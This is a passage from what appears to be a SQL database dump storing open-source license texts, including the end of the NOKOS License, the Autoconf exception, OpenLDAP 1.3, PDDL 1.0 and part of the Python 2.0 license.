Executable version of Covered Software or\nownership rights under a license of Your choice, which may contain terms different\nfrom this License, provided that You are in compliance with the terms of this\nLicense and that the license for the Executable version does not attempt to\nlimit or alter the recipient\'s rights in the Source Code version from the\nrights set forth in this License. If You distribute the Executable version\nunder a different license You must make it absolutely clear that any terms\nwhich differ from this License are offered by You alone, not by Nokia or any\nContributor. You hereby agree to indemnify Nokia and every Contributor for\nany liability incurred by Nokia or such Contributor as a result of any such\nterms You offer.\n\n 3.7 Larger Works.\n\nYou may create a Larger Work by combining Covered Software with other software\nnot governed by the terms of this License and distribute the Larger Work as\na single product. In such a case, You must make sure the requirements of this\nLicense are fulfilled for the Covered Software. 4. INABILITY TO COMPLY DUE\nTO STATUTE OR REGULATION.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Software due to statute, judicial\norder, or regulation then You must: (a) comply with the terms of this License\nto the maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\n\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it. 5. APPLICATION OF THIS LICENSE.\n\nThis License applies to code to which Nokia has attached the notice in Exhibit\nA and to related Covered Software. 6. VERSIONS OF THE LICENSE.\n\n 6.1 New Versions.\n\nNokia may publish revised and/or new versions of the License from time to\ntime. Each version will be given a distinguishing version number.\n\n 6.2 Effect of New Versions.\n\nOnce Covered Software has been published under a particular version of the\nLicense, You may always continue to use it under the terms of that version.\nYou may also choose to use such Covered Software under the terms of any subsequent\nversion of the License published by Nokia. No one other than Nokia has the\nright to modify the terms applicable to Covered Software created under this\nLicense. 7. DISCLAIMER OF WARRANTY.\n\nCOVERED SOFTWARE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE COVERED SOFTWARE IS FREE OF DEFECTS, MERCHANTABLE, FIT\nFOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE COVERED SOFTWARE IS WITH YOU. SHOULD ANY COVERED SOFTWARE\nPROVE DEFECTIVE IN ANY RESPECT, YOU (NOT NOKIA, ITS LICENSORS OR AFFILIATES\nOR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR\nOR CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF\nTHIS LICENSE. NO USE OF ANY COVERED SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT\nUNDER THIS DISCLAIMER. 8. TERMINATION.\n\n8.1 This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Software\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2 If You initiate litigation by asserting a patent infringement claim (excluding\ndeclatory judgment actions) against Nokia or a Contributor (Nokia or Contributor\nagainst whom You file such action is referred to as \"Participant\") alleging\nthat:\n\na) such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\nb) any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3 If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4 In the event of termination under Sections 8.1 or 8.2 above, all end user\nlicense agreements (excluding distributors and resellers) which have been\nvalidly granted by You or any distributor hereunder prior to termination shall\nsurvive termination. 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, NOKIA, ANY OTHER CONTRIBUTOR,\nOR ANY DISTRIBUTOR OF COVERED SOFTWARE, OR ANY SUPPLIER OF ANY OF SUCH PARTIES,\nBE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL\nDAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF\nGOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER\nCOMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED\nOF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY SHALL NOT\nAPPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH PARTY\'S\nNEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. SOME JURISDICTIONS\nDO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES,\nBUT MAY ALLOW LIABILITY TO BE LIMITED; IN SUCH CASES, A PARTY\'s, ITS EMPLOYEES,\nLICENSORS OR AFFILIATES\' LIABILITY SHALL BE LIMITED TO U.S. $50. Nothing contained\nin this License shall prejudice the statutory rights of any party dealing\nas a consumer. 10. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nAll rights in the Covered Software not expressly granted under this License\nare reserved. Nothing in this License shall grant You any rights to use any\nof the trademarks of Nokia or any of its Affiliates, even if any of such trademarks\nare included in any part of Covered Software and/or documentation to it.\n\nThis License is governed by the laws of Finland excluding its conflict-of-law\nprovisions. All disputes arising from or relating to this Agreement shall\nbe settled by a single arbitrator appointed by the Central Chamber of Commerce\nof Finland. The arbitration procedure shall take place in Helsinki, Finland\nin the English language. If any part of this Agreement is found void and unenforceable,\nit will not affect the validity of the balance of the Agreement, which shall\nremain valid and enforceable according to its terms. 11. RESPONSIBILITY FOR\nCLAIMS.\n\nAs between Nokia and the Contributors, each party is responsible for claims\nand damages arising, directly or indirectly, out of its utilization of rights\nunder this License and You agree to work with Nokia and Contributors to distribute\nsuch responsibility on an equitable basis. Nothing herein is intended or shall\nbe deemed to constitute any admission of liability. EXHIBIT A\n\nThe contents of this file are subject to the NOKOS License Version 1.0 (the\n\"License\"); you may not use this file except in compliance with the License.\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Software is\n\n______________________________________.\n\nCopyright © <year> Nokia and others. All Rights Reserved.\n\nContributor(s): ______________________________________.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(89,'Autoconf-exception-2.0','As a special exception, the Free Software Foundation gives unlimited permission to copy, distribute and modify the configure scripts that are the output of Autoconf. You need not follow the terms of the GNU General Public License when using or distributing such scripts, even though portions of the text of Autoconf appear in them. The GNU General Public License (GPL) does govern all other use of the material that constitutes the Autoconf program.\n\nCertain portions of the Autoconf source text are designed to be copied (in certain cases, depending on the input) into the output of Autoconf. We call these the \"data\" portions. The rest of the Autoconf source text consists of comments plus executable code that decides which of the data portions to output in any given case. We call these comments and executable code the \"non-data\" portions. Autoconf never copies any of the non-data portions into its output.\n\nThis special exception to the GPL applies to versions of Autoconf released by the Free Software Foundation. When you make and distribute a modified version of Autoconf, you may extend this special exception to the GPL to apply to your modified version as well, *unless* your modified version has the potential to copy into its output some of the text that was the non-data portion of the version that you started with. (In other words, unless your change moves or copies text from the non-data portions to the data portions.) If your modification has such potential, you must delete any notice of this special exception to the GPL from your modified version.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(90,'OLDAP-1.3','The OpenLDAP Public License\n\nVersion 1.3, 17 January 1999\n\nCopyright 1998-1999, The OpenLDAP Foundation. All Rights Reserved. Note: This\nlicense is derived from the \"Artistic License\" as distributed with the Perl\nProgramming Language. As significant differences exist, the complete license\nshould be read.\n\nPREAMBLE\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major archive site such as uunet.uu.net,\nor by allowing the Copyright Holder to include your modifications in the Standard\nVersion of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) accompany any non-standard executables with their corresponding Standard\nVersion executables, giving the non-standard executables non-standard names,\nand clearly documenting the differences in manual pages (or equivalent), together\nwith instructions on where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whomever generated them, and may be sold commercially,\nand may be aggregated with this Package.\n\n7. C subroutines supplied by you and linked into this Package in order to\nemulate subroutines and variables defined by this Package shall not be considered\npart of this Package, but are the equivalent of input as in Paragraph 6, provided\nthese subroutines do not change the behavior of the Package in any way that\nwould cause it to fail the regression tests for the Package.\n\n8. Software supplied by you and linked with this Package in order to use subroutines\nand variables defined by this Package shall not be considered part of this\nPackage and do not automatically fall under the copyright of this Package,\nand the executables produced by linking your software with this Package may\nbe used and redistributed without restriction and may be sold commercially.\n\n9. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n10. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(91,'PDDL-1.0','Open Data Commons - Public Domain Dedication & License (PDDL)\n\nPreamble\n\nThe Open Data Commons - Public Domain Dedication & Licence is a document intended\nto allow you to freely share, modify, and use this work for any purpose and\nwithout any restrictions. This licence is intended for use on databases or\ntheir contents (\"data\"), either together or individually.\n\nMany databases are covered by copyright. Some jurisdictions, mainly in Europe,\nhave specific special rights that cover databases called the \"sui generis\"\ndatabase right. Both of these sets of rights, as well as other legal rights\nused to protect databases and data, can create uncertainty or practical difficulty\nfor those wishing to share databases and their underlying data but retain\na limited amount of rights under a \"some rights reserved\" approach to licensing\nas outlined in the Science Commons Protocol for Implementing Open Access Data.\nAs a result, this waiver and licence tries to the fullest extent possible\nto eliminate or fully license any rights that cover this database and data.\nAny Community Norms or similar statements of use of the database or data do\nnot form a part of this document, and do not act as a contract for access\nor other terms of use for the database or data.\n\nThe position of the recipient of the work\n\nBecause this document places the database and its contents in or as close\nas possible within the public domain, there are no restrictions or requirements\nplaced on the recipient by this document. Recipients may use this work commercially,\nuse technical protection measures, combine this data or database with other\ndatabases or data, and share their changes and additions or keep them secret.\nIt is not a requirement that recipients provide further users with a copy\nof this licence or attribute the original creator of the data or database\nas a source. The goal is to eliminate restrictions held by the original creator\nof the data and database on the use of it by others.\n\nThe position of the dedicator of the work\n\nCopyright law, as with most other law under the banner of \"intellectual property\",\nis inherently national law. This means that there exists several differences\nin how copyright and other IP rights can be relinquished, waived or licensed\nin the many legal jurisdictions of the world. This is despite much harmonisation\nof minimum levels of protection. The internet and other communication technologies\nspan these many disparate legal jurisdictions and thus pose special difficulties\nfor a document relinquishing and waiving intellectual property rights, including\ncopyright and database rights, for use by the global community. Because of\nthis feature of intellectual property law, this document first relinquishes\nthe rights and waives the relevant rights and claims. It then goes on to license\nthese same rights for jurisdictions or areas of law that may make it difficult\nto relinquish or waive rights or claims.\n\nThe purpose of this document is to enable rightsholders to place their work\ninto the public domain. Unlike licences for free and open source software,\nfree cultural works, or open content licences, rightsholders will not be able\nto \"dual license\" their work by releasing the same work under different licences.\nThis is because they have allowed anyone to use the work in whatever way they\nchoose. Rightsholders therefore can\'t re-license it under copyright or database\nrights on different terms because they have nothing left to license. Doing\nso creates truly accessible data to build rich applications and advance the\nprogress of science and the arts.\n\nThis document can cover either or both of the database and its contents (the\ndata). Because databases can have a wide variety of content - not just factual\ndata - rightsholders should use the Open Data Commons - Public Domain Dedication\n& Licence for an entire database and its contents only if everything can be\nplaced under the terms of this document. Because even factual data can sometimes\nhave intellectual property rights, rightsholders should use this licence to\ncover both the database and its factual data when making material available\nunder this document; even if it is likely that the data would not be covered\nby copyright or database rights.\n\nRightsholders can also use this document to cover any copyright or database\nrights claims over only a database, and leave the contents to be covered by\nother licences or documents. They can do this because this document refers\nto the \"Work\", which can be either - or both - the database and its contents.\nAs a result, rightsholders need to clearly state what they are dedicating\nunder this document when they dedicate it.\n\nJust like any licence or other document dealing with intellectual property,\nrightsholders should be aware that one can only license what one owns. Please\nensure that the rights have been cleared to make this material available under\nthis document.\n\nThis document permanently and irrevocably makes the Work available to the\npublic for any use of any kind, and it should not be used unless the rightsholder\nis prepared for this to happen.\n\nPart I: Introduction\n\nThe Rightsholder (the Person holding rights or claims over the Work) agrees\nas follows:\n\n 1.0 Definitions of Capitalised Words\n\n\"Copyright\" - Includes rights under copyright and under neighbouring rights\nand similarly related sets of rights under the law of the relevant jurisdiction\nunder Section 6.4.\n\n\"Data\" - The contents of the Database, which includes the information, independent\nworks, or other material collected into the Database offered under the terms\nof this Document.\n\n\"Database\" - A collection of Data arranged in a systematic or methodical way\nand individually accessible by electronic or other means offered under the\nterms of this Document.\n\n\"Database Right\" - Means rights over Data resulting from the Chapter III (\"sui\ngeneris\") rights in the Database Directive (Directive 96/9/EC of the European\nParliament and of the Council of 11 March 1996 on the legal protection of\ndatabases) and any future updates as well as any similar rights available\nin the relevant jurisdiction under Section 6.4.\n\n\"Document\" - means this relinquishment and waiver of rights and claims and\nback up licence agreement.\n\n\"Person\" - Means a natural or legal person or a body of persons corporate\nor incorporate.\n\n\"Use\" - As a verb, means doing any act that is restricted by Copyright or\nDatabase Rights whether in the original medium or any other; and includes\nmodifying the Work as may be technically necessary to use it in a different\nmode or format. This includes the right to sublicense the Work.\n\n\"Work\" - Means either or both of the Database and Data offered under the terms\nof this Document.\n\n\"You\" - the Person acquiring rights under the licence elements of this Document.\n\n Words in the singular include the plural and vice versa.\n\n 2.0 What this document covers\n\n 2.1. Legal effect of this Document. This Document is:\n\na. A dedication to the public domain and waiver of Copyright and Database\nRights over the Work; and\n\nb. A licence of Copyright and Database Rights over the Work in jurisdictions\nthat do not allow for relinquishment or waiver.\n\n 2.2. Legal rights covered.\n\na. Copyright. Any copyright or neighbouring rights in the Work. Copyright\nlaw varies between jurisdictions, but is likely to cover: the Database model\nor schema, which is the structure, arrangement, and organisation of the Database,\nand can also include the Database tables and table indexes; the data entry\nand output sheets; and the Field names of Data stored in the Database. Copyright\nmay also cover the Data depending on the jurisdiction and type of Data; and\n\nb. Database Rights. Database Rights only extend to the extraction and re-utilisation\nof the whole or a substantial part of the Data. Database Rights can apply\neven when there is no copyright over the Database. Database Rights can also\napply when the Data is removed from the Database and is selected and arranged\nin a way that would not infringe any applicable copyright.\n\n 2.2 Rights not covered.\n\na. This Document does not apply to computer programs used in the making or\noperation of the Database;\n\nb. This Document does not cover any patents over the Data or the Database.\nPlease see Section 4.2 later in this Document for further details; and\n\nc. This Document does not cover any trade marks associated with the Database.\nPlease see Section 4.3 later in this Document for further details.\n\nUsers of this Database are cautioned that they may have to clear other rights\nor consult other licences.\n\n2.3 Facts are free. The Rightsholder takes the position that factual information\nis not covered by Copyright. This Document however covers the Work in jurisdictions\nthat may protect the factual information in the Work by Copyright, and to\ncover any information protected by Copyright that is contained in the Work.\n\nPart II: Dedication to the public domain\n\n 3.0 Dedication, waiver, and licence of Copyright and Database Rights\n\n3.1 Dedication of Copyright and Database Rights to the public domain. The\nRightsholder by using this Document, dedicates the Work to the public domain\nfor the benefit of the public and relinquishes all rights in Copyright and\nDatabase Rights over the Work.\n\na. The Rightsholder realises that once these rights are relinquished, that\nthe Rightsholder has no further rights in Copyright and Database Rights over\nthe Work, and that the Work is free and open for others to Use.\n\nb. The Rightsholder intends for their relinquishment to cover all present\nand future rights in the Work under Copyright and Database Rights, whether\nthey are vested or contingent rights, and that this relinquishment of rights\ncovers all their heirs and successors.\n\nThe above relinquishment of rights applies worldwide and includes media and\nformats now known or created in the future.\n\n3.2 Waiver of rights and claims in Copyright and Database Rights when Section\n3.1 dedication inapplicable. If the dedication in Section 3.1 does not apply\nin the relevant jurisdiction under Section 6.4, the Rightsholder waives any\nrights and claims that the Rightsholder may have or acquire in the future\nover the Work in:\n\n a. Copyright; and\n\n b. Database Rights.\n\nTo the extent possible in the relevant jurisdiction, the above waiver of rights\nand claims applies worldwide and includes media and formats now known or created\nin the future. The Rightsholder agrees not to assert the above rights and\nwaives the right to enforce them over the Work.\n\n3.3 Licence of Copyright and Database Rights when Sections 3.1 and 3.2 inapplicable.\nIf the dedication and waiver in Sections 3.1 and 3.2 does not apply in the\nrelevant jurisdiction under Section 6.4, the Rightsholder and You agree as\nfollows:\n\na. The Licensor grants to You a worldwide, royalty-free, non-exclusive, licence\nto Use the Work for the duration of any applicable Copyright and Database\nRights. These rights explicitly include commercial use, and do not exclude\nany field of endeavour. To the extent possible in the relevant jurisdiction,\nthese rights may be exercised in all media and formats whether now known or\ncreated in the future.\n\n3.4 Moral rights. This section covers moral rights, including the right to\nbe identified as the author of the Work or to object to treatment that would\notherwise prejudice the author\'s honour and reputation, or any other derogatory\ntreatment:\n\na. For jurisdictions allowing waiver of moral rights, Licensor waives all\nmoral rights that Licensor may have in the Work to the fullest extent possible\nby the law of the relevant jurisdiction under Section 6.4;\n\nb. If waiver of moral rights under Section 3.4 a in the relevant jurisdiction\nis not possible, Licensor agrees not to assert any moral rights over the Work\nand waives all claims in moral rights to the fullest extent possible by the\nlaw of the relevant jurisdiction under Section 6.4; and\n\nc. For jurisdictions not allowing waiver or an agreement not to assert moral\nrights under Section 3.4 a and b, the author may retain their moral rights\nover the copyrighted aspects of the Work.\n\nPlease note that some jurisdictions do not allow for the waiver of moral rights,\nand so moral rights may still subsist over the work in some jurisdictions.\n\n 4.0 Relationship to other rights\n\n4.1 No other contractual conditions. The Rightsholder makes this Work available\nto You without any other contractual obligations, either express or implied.\nAny Community Norms statement associated with the Work is not a contract and\ndoes not form part of this Document.\n\n4.2 Relationship to patents. This Document does not grant You a licence for\nany patents that the Rightsholder may own. Users of this Database are cautioned\nthat they may have to clear other rights or consult other licences.\n\n4.3 Relationship to trade marks. This Document does not grant You a licence\nfor any trade marks that the Rightsholder may own or that the Rightsholder\nmay use to cover the Work. Users of this Database are cautioned that they\nmay have to clear other rights or consult other licences.\n\nPart III: General provisions\n\n 5.0 Warranties, disclaimer, and limitation of liability\n\n5.1 The Work is provided by the Rightsholder \"as is\" and without any warranty\nof any kind, either express or implied, whether of title, of accuracy or completeness,\nof the presence of absence of errors, of fitness for purpose, or otherwise.\nSome jurisdictions do not allow the exclusion of implied warranties, so this\nexclusion may not apply to You.\n\n5.2 Subject to any liability that may not be excluded or limited by law, the\nRightsholder is not liable for, and expressly excludes, all liability for\nloss or damage however and whenever caused to anyone by any use under this\nDocument, whether by You or by anyone else, and whether caused by any fault\non the part of the Rightsholder or not. This exclusion of liability includes,\nbut is not limited to, any special, incidental, consequential, punitive, or\nexemplary damages. This exclusion applies even if the Rightsholder has been\nadvised of the possibility of such damages.\n\n5.3 If liability may not be excluded by law, it is limited to actual and direct\nfinancial loss to the extent it is caused by proved negligence on the part\nof the Rightsholder.\n\n 6.0 General\n\n6.1 If any provision of this Document is held to be invalid or unenforceable,\nthat must not affect the cvalidity or enforceability of the remainder of the\nterms of this Document.\n\n6.2 This Document is the entire agreement between the parties with respect\nto the Work covered here. It replaces any earlier understandings, agreements\nor representations with respect to the Work not specified here.\n\n6.3 This Document does not affect any rights that You or anyone else may independently\nhave under any applicable law to make any use of this Work, including (for\njurisdictions where this Document is a licence) fair dealing, fair use, database\nexceptions, or any other legally recognised limitation or exception to infringement\nof copyright or other applicable laws.\n\n6.4 This Document takes effect in the relevant jurisdiction in which the Document\nterms are sought to be enforced. If the rights waived or granted under applicable\nlaw in the relevant jurisdiction includes additional rights not waived or\ngranted under this Document, these additional rights are included in this\nDocument in order to meet the intent of this Document.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(92,'Python-2.0','PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2\n\n1. This LICENSE AGREEMENT is between the Python Software Foundation (\"PSF\"),\nand the Individual or Organization (\"Licensee\") accessing and otherwise using\nthis software (\"Python\") in source or binary form and its associated documentation.\n\n2. Subject to the terms and conditions of this License Agreement, PSF hereby\ngrants Licensee a nonexclusive, royalty-free, world-wide license to reproduce,\nanalyze, test, perform and/or display publicly, prepare derivative works,\ndistribute, and otherwise use Python alone or in any derivative version, provided,\nhowever, that PSF\'s License Agreement and PSF\'s notice of copyright, i.e.,\n\"Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation;\nAll Rights Reserved\" are retained in Python alone or in any derivative version\nprepared by Licensee.\n\n3. In the event Licensee prepares a derivative work that is based on or incorporates\nPython or any part thereof, and wants to make the derivative work available\nto others as provided herein, then Licensee hereby agrees to include in any\nsuch work a brief summary of the changes made to Python.\n\n4. PSF is making Python available to Licensee on an \"AS IS\" basis. PSF MAKES\nNO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT\nNOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY\nOF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF\nPYTHON WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n\n5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON FOR ANY\nINCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF MODIFYING,\nDISTRIBUTING, OR OTHERWISE USING PYTHON, OR ANY DERIVATIVE THEREOF, EVEN IF\nADVISED OF THE POSSIBILITY THEREOF.\n\n6. This License Agreement will automatically terminate upon a material breach\nof its terms and conditions.\n\n7. Nothing in this License Agreement shall be deemed to create any relationship\nof agency, partnership, or joint venture between PSF and Licensee. This License\nAgreement does not grant permission to use PSF trademarks or trade name in\na trademark sense to endorse or promote products or services of Licensee,\nor any third party.\n\n8. By copying, installing or otherwise using Python, Licensee agrees to be\nbound by the terms and conditions of this License Agreement. BEOPEN.COM LICENSE\nAGREEMENT FOR PYTHON 2.0\n\nBEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1\n\n1. This LICENSE AGREEMENT is between BeOpen.com (\"BeOpen\"), having an office\nat 160 Saratoga Avenue, Santa Clara, CA 95051, and the Individual or Organization\n(\"Licensee\") accessing and otherwise using this software in source or binary\nform and its associated documentation (\"the Software\").\n\n2. Subject to the terms and conditions of this BeOpen Python License Agreement,\nBeOpen hereby grants Licensee a non-exclusive, royalty-free, world-wide license\nto reproduce, analyze, test, perform and/or display publicly, prepare derivative\nworks, distribute, and otherwise use the Software alone or in any derivative\nversion, provided, however, that the BeOpen Python License is retained in\nthe Software, alone or in any derivative version prepared by Licensee.\n\n3. BeOpen is making the Software available to Licensee on an \"AS IS\" basis.\nBEOPEN MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY\nOF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND DISCLAIMS ANY REPRESENTATION\nOR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT\nTHE USE OF THE SOFTWARE WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n\n4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE\nFOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT\nOF USING, MODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY DERIVATIVE THEREOF,\nEVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n\n5. This License Agreement will automatically terminate upon a material breach\nof its terms and conditions.\n\n6. This License Agreement shall be governed by and interpreted in all respects\nby the law of the State of California, excluding conflict of law provisions.\nNothing in this License Agreement shall be deemed to create any relationship\nof agency, partnership, or joint venture between BeOpen and Licensee. This\nLicense Agreement does not grant permission to use BeOpen trademarks or trade\nnames in a trademark sense to endorse or promote products or services of Licensee,\nor any third party. As an exception, the \"BeOpen Python\" logos available at\nhttp://www.pythonlabs.com/logos.html may be used according to the permissions\ngranted on that web page.\n\n7. By copying, installing or otherwise using the software, Licensee agrees\nto be bound by the terms and conditions of this License Agreement. CNRI OPEN\nSOURCE LICENSE AGREEMENT (for Python 1.6b1) IMPORTANT: PLEASE READ THE FOLLOWING\nAGREEMENT CAREFULLY.\n\nBY CLICKING ON \"ACCEPT\" WHERE INDICATED BELOW, OR BY COPYING, INSTALLING OR\nOTHERWISE USING PYTHON 1.6, beta 1 SOFTWARE, YOU ARE DEEMED TO HAVE AGREED\nTO THE TERMS AND CONDITIONS OF THIS LICENSE AGREEMENT.\n\n1. This LICENSE AGREEMENT is between the Corporation for National Research\nInitiatives, having an office at 1895 Preston White Drive, Reston, VA 20191\n(\"CNRI\"), and the Individual or Organization (\"Licensee\") accessing and otherwise\nusing Python 1.6, beta 1 software in source or binary form and its associated\ndocumentation, as released at the www.python.org Internet site on August 4,\n2000 (\"Python 1.6b1\").\n\n2. Subject to the terms and conditions of this License Agreement, CNRI hereby\ngrants Licensee a non-exclusive, royalty-free, world-wide license to reproduce,\nanalyze, test, perform and/or display publicly, prepare derivative works,\ndistribute, and otherwise use Python 1.6b1 alone or in any derivative version,\nprovided, however, that CNRIs License Agreement is retained in Python 1.6b1,\nalone or in any derivative version prepared by Licensee.\n\nAlternately, in lieu of CNRIs License Agreement, Licensee may substitute the\nfollowing text (omitting the quotes): \"Python 1.6, beta 1, is made available\nsubject to the terms and conditions in CNRIs License Agreement. This Agreement\nmay be located on the Internet using the following unique, persistent identifier\n(known as a handle): 1895.22/1011. This Agreement may also be obtained from\na proxy server on the Internet using the URL:http://hdl.handle.net/1895.22/1011\".\n\n3. In the event Licensee prepares a derivative work that is based on or incorporates\nPython 1.6b1 or any part thereof, and wants to make the derivative work available\nto the public as provided herein, then Licensee hereby agrees to indicate\nin any such work the nature of the modifications made to Python 1.6b1.\n\n4. CNRI is making Python 1.6b1 available to Licensee on an \"AS IS\" basis.\nCNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF\nEXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND DISCLAIMS ANY REPRESENTATION\nOR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT\nTHE USE OF PYTHON 1.6b1 WILL NOT INFRINGE ANY THIRD PARTY 